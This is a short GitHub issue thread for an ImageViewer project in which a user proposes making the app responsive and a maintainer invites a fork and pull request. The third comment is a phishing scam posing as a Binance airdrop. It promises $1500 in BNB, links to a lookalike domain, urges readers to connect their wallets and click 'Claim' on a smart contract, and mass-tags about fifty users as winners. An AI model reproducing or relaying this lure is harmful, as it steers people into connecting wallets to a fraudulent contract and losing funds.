### ISSUE TITLE
new features 

### ISSUE THREAD

**Issue by edilson258** [mariovarela99/ImageViewer#1]
it is an amazing project! Let's make it reponsive.

**Comment by trupakufi** [comment]
Do it. You can Fork it. @edilson258 and make the changes after this you can make a Pull Request and we will talk about it.

**Comment by anilv2k** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

Don't miss out on your $1500 in BNB! Act now to secure your tokens.


Winners: @eulerpb, @italocegatta, @ThesllaDev, @MiguelLopesBR, @sobeitnow0, @leominari, @e-bruns, @ivanmrosa, @iagocaran, @Adsandro, @roxy22788, @renCst, @Arthur-Araujoo, @fabiorolim, @Diogo-Esteves, @anacarolbs, @dorettoartesp, @filipemsc, @felipedelta0, @nathanTiba, @evandro-teixeira, @leticiasouza-dev, @kidush, @onlurking, @alancmag, @GuilhermeSilvaDeAvila, @davieduardo94, @synga, @Patricia17991, @josedsneto, @gabcrrst, @isaac-ReDev, @WillianTomaz, @Pkx00, @andersondanilo, @kef93, @nycolexavier, @MomoSuperNow, @GabrielBuche, @costa-m, @lucas-wendell, @m0ndr4g0n, @mederafael, @matheus-fls, @manzoliric, @richardhfc, @FerdiCayet, @hss-mateus, @Gustavobailoni, @Casca0
